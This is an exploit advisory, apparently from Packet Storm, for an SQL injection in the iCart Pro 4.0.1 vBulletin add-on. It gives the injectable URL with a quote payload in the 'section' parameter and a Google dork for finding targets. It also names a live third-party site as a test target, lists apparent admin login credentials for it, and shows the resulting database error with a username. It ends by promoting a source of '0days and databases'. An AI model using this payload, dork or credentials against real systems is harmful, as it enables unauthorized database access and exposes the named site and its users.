iCart Pro version 4.0.1 appears to suffer from a remote SQL injection vulnerability.
3b48b3579020811b9ff44226fda4004419b2ed8fa19f76a27cc1df8a74f23ac0# Exploit Title: vbcovor ICART SQLI
# Date: 25/01/2013
# Author(s): n3tw0rk
# Contact: Mail:infectedelite@gmail.com
# Product: iCart Pro
# Software Version 4.0.1
# Product Download: http://www.vbcover.com/icart.php?do=product&productid=61
# Google Dork: inurlicart.php
# Require Editting product access for SQL error admin account will work
# Exploit link:icart.php?do=editproduct&productid=[product ID]§ion='
Live link:https://www.rostyles.com/forum/icart.php?do=editproduct&productid=19§ion='
(requires admin access login test:1234)
Database error in vBulletin 4.2.0:
Invalid SQL:
SELECT name, ' FROM covercartproduct WHERE id = '19';
MySQL Error : You have an error in your SQL syntax; check the manual
that corresponds to your MySQL server version for the right syntax to
use near '19'' at line 1
Error Number : 1064
Request Date : Friday, January 25th 2013 @ 06:46:30 AM
Error Date : Friday, January 25th 2013 @ 06:46:31 AM
Script :
http://www.rostyles.com/forum/icart.php?do=editproduct&productid=19§ion='
Referrer :
IP Address :
Username : Teascu Dorin
Classname : vB_Database
MySQL Version : 5.0.96-log
Shouts to: Teoz, n0tch, shadow008. http://myupdatezone.com for more
0days and databases
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed